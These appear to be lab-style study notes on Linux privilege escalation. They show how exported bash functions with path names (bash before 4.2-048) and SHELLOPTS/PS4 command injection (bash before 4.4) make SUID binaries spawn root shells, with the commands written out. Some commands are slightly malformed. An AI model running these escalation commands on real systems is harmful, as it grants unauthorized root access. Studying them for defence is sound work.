110 - Abusing Shell Features

# Abusing Shell Features ## Legacy Bash Versions In some shells (notably Bash <4.2-048) it is possible to define user functions with an absolute path name. These functions can be exported so that subprocesses have access to them, and the functions can take precedence over the actual executable being called. Use the following command to find all the SUID and GID files: ```bash $ find / -type f -a $ -perm -u+s -o -perm -g+s $ -exec ls -l {} \; 2> /dev/null ``` The output shows that the suid-env file executes with root permissions: ![[Pasted image 20220806110434.png]] Executing the file shows it appears to attempt to start the appache2 webserver: ![[Pasted image 20220806110529.png]] Running the strings command against the file, it appears the file is trying to run the service command to do this using an absolute path: ![[Pasted image 20220806110629.png]] Confirm this using strace: ![[Pasted image 20220806110758.png]] If the machine is running a version of bash lower than 4.2-048, it will allow for the definition of bash functions with forward slashes in their names. These functions then take precedence over any executables with an identical path. Create a function with /usr/sbin/service as the name and make it execute bash: ```bash $ function /usr/sbin/service { /bin/bash -p; } ``` Then export the function: ```bash $ export -f /usr/sbin/service ``` Finally, run the /usr/local/bin/suid-env2 file again, and it will spawn a root shell. --- ## SHELLOPTS Bash has a debugging mode which can be enabled with the -x command line option, or by modifying the SHELLOPTS environment variable to include xtrace. By default, SHELLOPTS is read only, however the env command allows SHELLOPTS to be set. When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debug statements. This variable can include an embedded command, which will execute every time it is shown. If a SUID file runs another program via Bash (e.g. by using system()) these environment variables can be inherited. If an SUID file is being executed, this command will execute with the privileges of the file owner. In Bash versions 4.4 and above, the PS4 environment variable is not inherited by shells running as root. In the below example, we see that it is bash version 4.1.5: ![[Pasted image 20220806112450.png]] Versions of bash lower than 4.4 inherit the PS4 environment variable when running as root. The PS4 environment variable is used to display the prompt while bash's debugging mode is on. Run the vulnerable file in a modified environment where bash's debugging mode is enabled. ```bash $ env -i SHELLOPTS=xtrace PS4='<test>' /path/to/file ``` Our PS4 input is prepended to each output, since this is bash we can use command substitution to execute a command and display the result. ```bash $ env -i SHELLOPTS=xtrace PS4='$(whoami)' /path/to/file ``` The 'whoami' command was executed, and it was executed as root: ![[Pasted image 20220806114111.png]] Use this execution to create a rootbash SUID file, we can use it to spawn a root shell. ```bash $ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp rootbash; chmod +s /tmp/rootbash)' /path/to/file $ /tmp/rootbash -p ```